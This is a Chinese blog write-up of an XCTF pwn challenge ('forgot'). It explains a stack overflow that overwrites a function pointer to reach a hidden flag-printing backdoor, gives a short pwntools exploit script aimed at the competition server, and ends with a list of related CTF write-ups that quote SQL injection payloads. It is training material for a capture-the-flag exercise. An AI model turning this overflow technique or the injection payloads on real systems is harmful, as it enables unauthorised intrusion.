xctf高手进阶第一题

最新推荐文章于 2020-11-22 21:06:00 发布
最新推荐文章于 2020-11-22 21:06:00 发布
阅读量225 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/104076442
版权

首先,fgets读取v13,然后scanf读取v2,通过程序条件判断发现,输入a@a.aaaaaaa时,程序会执行到v12,覆盖v12即可调用指定地址的函数。
在做题时,进入误区,自己构造system栈帧,结果一直失败,可能有的地方计算错误。writeup里的方法是直接调用后门函数0x80486cc处的函数,直接输出flag。这个后门函数在IDA Pro中没有显示,可以通过objdump -d ./forgot |grep system查找调用system函数的指令地址,再查看IDA中指定地址的程序,从而确定该函数作用是输出flag。
exp:
from pwn import *
p=remote(‘111.198.29.45’,‘36288’)
print p.recv()
p.sendline(‘a’*4)
print p.recv()
payload=“a@a.chu”+‘A’*25+p32(0x8048604)+p32(0x8048618)
+p32(0x804862C)+p32(0x8048640)+p32(0x8048654)+p32(0x8048668)
+p32(0x804867C)+p32(0x8048690)+p32(0x80486A4)+p32(0x80486cc)
p.sendline(payload)
print p.recv()

neuisf
关注
专栏目录
MOBILE高手进阶区_第17_TryGetFlag1
HURUWO的技术博客
10-22 349
目描述 本目如从逆向出发难度较高,重点考察对移动应用动态分析工具的熟悉程度。 目链接 https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=1&id=4862&page=1 目分析 java层静态分析 1.下载apk文件使用jadx打开静态分析源码 2.发现加密方法处于so层 而且main方法里面内容被抽空,加壳 3.查看smail源码 全部都是 nop nop 说明指令被抽出 脱壳处理
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列19
重新启程
12-25 1641
目地址:pwn1 babystack 已经到了高手进阶区的第八了,已经渐入佳境了。哈哈! 废话不说,看看目先 厦门邀请赛的目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
XCTF-高手进阶区:NaNNaNNaNNaN-Batman
1stPeak's Blog
06-14 3869
XCTF-高手进阶区-第四:NaNNaNNaNNaN-Batman 目标: 了解js代码(eval函数、splice函数) 了解正则 Writeup (1)这里没有目标环境,只有一个附件,好吧,那我们就下载下来 我这里先用sublime.txt打开看看 原来是js代码,那么我们接下来将文件后缀改为js,用浏览器打开查看: 复制的源码: <script>_='fu...
XCTF-高手进阶区:lottery
1stPeak's Blog
03-02 724
目: 该存在git泄露,使用GitHack.py进行扫描 最后定位在api.php中的buy函数存在漏洞 源码: function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_number...
XCTF web高手进阶区_1-6
H4ppyD0g的博客
08-08 1078
1 ics-06 去报表中心,发现url后面跟的参数是?id=1,说明id是一个整数型,然后bp抓包,进行爆破id,2333成功。 ———————————— 2 NewsCenter 1' union select 1,2,3 #判断存在sql注入漏洞 (知识点:'是为了闭合前面的单引号,接着让它执行我们自己写的语句,#注释掉后面的后台语句) 1' union select 1,2,databas...
XCTF篇:Web (高手进阶区) 1-2
小明师傅博客
06-20 503
1.baby_web 访问index.php F12查看发现重定向了,但是拿到flag 2.Training-WWW-Robots 访问robots.txt 完成 本来打算做1-12的,后来发现第三要漏洞复现
xctf-pwn新手区 【第一
mid2dog
09-22 2701
前言 书本知识学的差不多了,是时候不看解来自己做了(雾) 正文 攻防世界新手区pwn第一——level2 下过来附件就一个,没有libc可以连,应该是很适合萌新的 先用虚拟机checksec 看保护,顺便连一下看看 感动,32位小端序,保护只开了一个NX 好像输入什么都会返回123 打开ida反汇编看看 有这么多函数,从main入手 已经有一点汇编基础了,勉强能看懂。 但还是F5查看伪代码看的爽快 双击第一个函数进去看看 这里已经可以看到是一个简单的栈溢出了。因为定义buf是0x88个字
攻防世界 web高手进阶区 10分 biscuiti-300
闵行小鱼塘
11-07 1043
继续ctf的旅程,开始攻防世界web高手进阶区的10分,本文是biscuiti-300的writeup
pwn100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列16
重新启程
12-23 1320
目地址:pwn100 本已经是高手进阶区的第五了,难度也在不断加大。需要补充的知识点也越来越多了。 废话不说,看看目 没什么建议和描述,那就先下载附件,看看保护机制 root@mypwn:/ctf/work/python/pwn-100# checksec d0b5f9b486bb480c9035839ec896252e [*] '/ctf/work/python/pwn-10...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列14
重新启程
12-23 1840
目地址:warmup 这是高手进阶区的第三,我们先看下目内容 这个目没有附件,那就是要fuzz的目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
XCTFweb进阶练习----自我做思路writeup
qq_43573131的博客
11-26 437
快捷目录: 1.cat 2.2,ics-05(XCTF 4th-CyberEarth) 1.cat 考察知识点: Django框架 cURL漏洞
XCTF-高手进阶区:mfw
1stPeak's Blog
06-13 3840
XCTF-高手进阶区-第三:mfw 目标: 学习git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 会简单构造php的payload 了解urlencode Writeup (1)我们在http://111.198.29.45:46634/?page=about页面看到如下图...
XCTF 攻防世界】MISC 杂项 高手进阶区 Reverse-it
weixin_45844670的博客
08-13 678
目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4949&page=1 下载附件得的一个空白文件 用file命令查看是什么文件 但是什么也没得到 使用foremost也没有分离出来 那么用010editor看了看 发现端倪 文件头: 文件头的部分是9D FF,反过来就是FFD9,是jpg的文件头 文件尾: 从后往前看是FF D8 FF,正好也是jpg的文件头 找到了反转
XCTF 4th-QCTF-2018 pwn stack2 writeup
qq_39596232的博客
08-30 888
目描述: 暂无 分析思路: 1、首先拿到ELF文件,我们首先查看一下详细信息: tucker@ubuntu:~/pwn$ file stack2 stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux...
攻防世界-web writeup(xctf
菜的只能随便写写博客
07-15 2541
0x01 view source flag放在源码之中,但是网页的脚本限制了鼠标作用,无法点击和选中,直接F12或者浏览器快捷键查看网页源码即可得到flag flag:cyberpeace{e07dcafaeeb31df23b4d661dd4da56f9}   0x02 get_post GET和POST是http协议的两种主要请求方式 GET请求直接把参数包含在url中 POST...
XCTF-高手进阶区:ics-06
1stPeak's Blog
06-13 3191
第一:ics-06 目标: id爆破 Writeup 发现报表中心有id可以爆破,直接使用burp爆破 数字的id字典可以用python生成,代码: for m in range (100001): print(m) ...
XCTF web新手练习区_1-12
H4ppyD0g的博客
07-15 2360
view_source 查看网页源码的方法: (1) F12(如果只按F12没反应,就功能键+F12)可以查看网页源码。 (2) 网页源码的url以view-source: 开头。在本网页的url前面加上这个可以获取。 (3) 通过python的requests.get()可以获取网页源码。 ———————————— get_post ...
攻防世界pwn-stack2学习记录
Hotspurs的博客
11-18 1364
pwn新手一枚,做这时苦苦没找出来解上说的0x84偏移,经过多次尝试,终于找到了正确的方式,遂以记录。 首先分析漏洞点: 当选择3.change number时,程序没有对输入的v5进行检测,遂可以产生溢出 之后看到程序给了getflag 开启动态调试,此时在v13[v5] = v7;处下断点。 如图所示输入 转到汇编指令,查看这个地址(edx存的就是输入9,看看他把9...
攻防世界 Misc高手进阶区 3分 Excaliflag
闵行小鱼塘
11-22 486
继续ctf的旅程,攻防世界Misc高手进阶区的3分,本篇是Excaliflag的writeup
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值